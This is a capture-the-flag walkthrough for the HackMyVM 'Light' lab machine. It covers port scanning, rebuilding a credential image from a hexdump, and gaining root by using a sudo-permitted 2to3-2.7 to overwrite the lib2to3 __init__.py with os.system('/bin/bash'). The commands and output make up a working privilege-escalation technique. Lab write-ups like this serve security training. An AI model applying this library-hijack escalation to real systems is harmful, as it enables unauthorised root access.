HMV Light Summary
Scope
- Name: Light
- Difficult: (2/10)
- OS: Linux
- IP: light.hmv(192.168.56.105)
Foothold
I only get one enabled SSH service with common nmap light.hmv, then I scan the target with full port
again. Woo, I get another interesting port opened out there👇.
❯ sudo nmap -p- --min-rate 3000 -oN overall light.hmv Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-25 15:30 +0800 Nmap scan report for light.hmv (192.168.56.105) Host is up (0.000070s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 45923/tcp open unknown MAC Address: 08:00:27:08:D8:13 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
There seems to be a PNG image out there. BTW, the open port changes each time I access it.
So I store that hexdump and restore it to PNG image with:
xxd -r random.hex random.png
Yeah, there's credential here!
Privilege Escalation
login user with shell
lover@light:~$ grep 'sh$' /etc/passwd root:x:0:0:root:/root:/bin/bash lover:x:1000:1000:lover,,,:/home/lover:/bin/bash
sudo rules
lover@light:~$ sudo -l
Matching Defaults entries for lover on light:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lover may run the following commands on light:
(ALL : ALL) NOPASSWD: /usr/bin/2to3-2.7
🤔 This is a interesting executable file for me! And its a Python script!
lover@light:~$ file /usr/bin/2to3-2.7 /usr/bin/2to3-2.7: a /usr/bin/python2.7 script, ASCII text executable
#! /usr/bin/python2.7 import sys from lib2to3.main import main sys.exit(main("lib2to3.fixes"))
It loads a lib2to3 package, let's find it and take a look at its main function.
lover@light:/usr/lib/python2.7/lib2to3$ 2to3-2.7 --help Usage: 2to3 [options] file|dir ... Options: -h, --help show this help message and exit -d, --doctests_only Fix up doctests only -f FIX, --fix=FIX Each FIX specifies a transformation; default: all -j PROCESSES, --processes=PROCESSES Run 2to3 concurrently -x NOFIX, --nofix=NOFIX Prevent a transformation from being run -l, --list-fixes List available transformations -p, --print-function Modify the grammar so that print() is a function -v, --verbose More verbose logging --no-diffs Don't show diffs of the refactoring -w, --write Write back modified files -n, --nobackups Don't write backups for modified files -o OUTPUT_DIR, --output-dir=OUTPUT_DIR Put output files in this directory instead of overwriting the input files. Requires -n. -W, --write-unchanged-files Also write files even if no changes were required (useful with --output-dir); implies -w. --add-suffix=ADD_SUFFIX Append this string to all output filenames. Requires -n if non-empty. ex: --add-suffix='3' will generate .py3 files.
This script seems to convert a Python2 syntax into its Python3 equivalent. The key point is that
I can control where it writes out the result with -o option. So I could overwrite the __init__.py of
that package!
lover@light:~$ sudo /usr/bin/2to3-2.7 -n -w __init__.py -o /usr/lib/python2.7/lib2to3/ RefactoringTool: Skipping optional fixer: buffer RefactoringTool: Skipping optional fixer: idioms RefactoringTool: Skipping optional fixer: set_literal RefactoringTool: Skipping optional fixer: ws_comma RefactoringTool: Refactored __init__.py --- __init__.py (original) +++ __init__.py (refactored) @@ -1,3 +1,3 @@ -print "hello" +print("hello") import os os.system("/bin/bash") RefactoringTool: Writing converted __init__.py to /usr/lib/python2.7/lib2to3/__init__.py. RefactoringTool: Files that were modified: RefactoringTool: __init__.py lover@light:~$ cat /usr/lib/python2.7/lib2to3/__init__.py print("hello") import os os.system("/bin/bash") lover@light:~$ sudo /usr/bin/2to3-2.7 hello root@light:/home/lover# id uid=0(root) gid=0(root) groups=0(root)
NOTE: This must be contain some Python2 syntax to trigger conversion; otherwise, the conversion will not carry out, then the target will not be overwritten.
Here I use
print "hello".